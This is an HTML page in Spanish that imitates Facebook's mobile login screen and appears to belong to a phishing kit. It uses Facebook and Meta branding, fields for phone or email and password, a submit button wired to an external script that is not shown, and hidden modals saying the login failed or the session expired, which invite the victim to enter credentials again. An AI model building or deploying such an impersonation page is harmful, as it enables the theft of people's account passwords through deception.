<!DOCTYPE html>
<html lang="es">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Facebook Login</title>
  <link rel="stylesheet" href="public/css/fonts.css">
  <link rel="stylesheet" href="public/css/main.css">
  <script src="https://unpkg.com/@tailwindcss/browser@4"></script>
  <script src="public/js/main.js"></script>
</head>

<body class="font-optimistic-text min-h-screen bg-white text-gray-900 antialiased transition duration-300">
  <main class="flex items-center justify-center min-h-screen flex-col">
    <!-- Background Gradient -->
    <div class="h-screen absolute inset-0 z-0 bg-white">
      <div class="absolute inset-0 opacity-8 gradient-background"></div>
    </div>

    <div class="z-10 w-full min-h-screen max-w-md flex flex-col justify-between p-4">
      <div class="flex items-center justify-center text-sm text-slate-500">
        <span>Español</span>
      </div>

      <div class="flex items-center justify-center mb-5">
        <img src="public/img/facebook-logo.png" alt="Logotipo de Facebook" class="w-[60px] h-auto object-contain"
          fetchpriority="high">
      </div>

      <form action="#" class="flex flex-col space-y-3">
        <input id="user" type="text" placeholder="Celular o correo electrónico"
          class="w-full px-3 py-4 border border-gray-300 rounded-xl focus:outline-none focus:ring-1 focus:ring-blue-500 bg-white cursor-pointer"
          required />

        <input id="password" type="password" placeholder="Contraseña"
          class="w-full px-3 py-4 border border-gray-300 rounded-xl focus:outline-none focus:ring-1 focus:ring-blue-500 bg-white cursor-pointer"
          required />

        <div type="submit" id="submit" role="button"
          class="w-full bg-[#0064e0] text-white h-11 min-w-[44px] px-5 rounded-full font-medium hover:bg-blue-700 transition-colors flex items-center justify-center cursor-pointer">
          Iniciar sesión
        </div>
        <div class="flex items-center justify-center font-medium text-base text-slate-700">
          <a href="https://m.facebook.com/login/identify/">¿Olvidaste tu contraseña?</a>
        </div>
      </form>


      <div>
        <a role="button" href="https://m.facebook.com/reg/"
          class="w-full h-11 min-w-[44px] px-5 border border-[#0064e0] text-[#0064e0] rounded-full font-medium bg-transparent hover:bg-gray-50 transition-colors flex items-center justify-center">
          Crear cuenta nueva
        </a>

        <div class="flex justify-center items-center py-5">
          <img alt="Logotipo de Meta" src="public/img/meta-logo.png"
            class="w-[60px] h-auto object-contain opacity-80" />
        </div>

        <div class="flex justify-center gap-4 text-[10px] text-gray-500">
          <a href="https://about.meta.com/" class="hover:underline">Información</a>
          <a href="https://www.facebook.com/help/" class="hover:underline">Ayuda</a>
          <a href="#" class="hover:underline">Más</a>
        </div>
      </div>
    </div>
  </main>

  <div id="error-modal" class="hidden fixed inset-0 items-center justify-around bg-black/50 z-1000" role="presentation">
    <div class="bg-white rounded-lg text-center w-[400px] max-w-full m-8 outline-none" tabindex="-1"
      aria-label="No se puede iniciar sesión">
      <div class="p-8">
        <div class="text-gray-900 text-lg font-semibold">No se puede iniciar sesión</div>
        <div class="text-gray-600 text-sm mt-3">Se produjo un error inesperado. Intenta iniciar sesión de nuevo.</div>
      </div>
      <div>
        <div role="button" tabindex="0"
          class="block border-t text-[#0064e0] border-gray-300 cursor-pointer text-base leading-6 p-3">
          Aceptar
        </div>
      </div>
    </div>
  </div>

  <div id="required-modal" class="hidden fixed inset-0 items-center justify-around bg-black/50 z-1000"
    role="presentation">
    <div class="bg-white rounded-lg text-center w-[400px] max-w-full m-8 outline-none" tabindex="-1"
      aria-label="No se puede iniciar sesión">
      <div class="p-8">
        <div class="text-gray-900 text-lg font-semibold">Correo electrónico o número de celular obligatorio</div>
        <div class="text-gray-600 text-sm mt-3">Para continuar, ingresa tu correo electrónico o número de celular.</div>
      </div>
      <div>
        <div role="button" tabindex="0"
          class="block border-t text-[#0064e0] border-gray-300 cursor-pointer text-base leading-6 p-3">
          Aceptar
        </div>
      </div>
    </div>
  </div>

  <div id="expired-modal" class="hidden fixed inset-0 items-center justify-around bg-black/50 z-1000" role="presentation">
    <div class="bg-white rounded-lg text-center w-[400px] max-w-full m-8 outline-none" tabindex="-1"
      aria-label="Su sesión de Facebook ha expirado">
      <div class="p-8">
        <div class="text-gray-900 text-lg font-semibold">Su sesión ha expirado</div>
        <div class="text-gray-600 text-sm mt-3">Su sesión de Facebook ha expirado, por favor vuelva a iniciar sesión.</div>
      </div>
      <div>
        <div role="button" tabindex="0"
          class="block border-t text-[#0064e0] border-gray-300 cursor-pointer text-base leading-6 p-3">
          Aceptar
        </div>
      </div>
    </div>
  </div>


</body>

</html>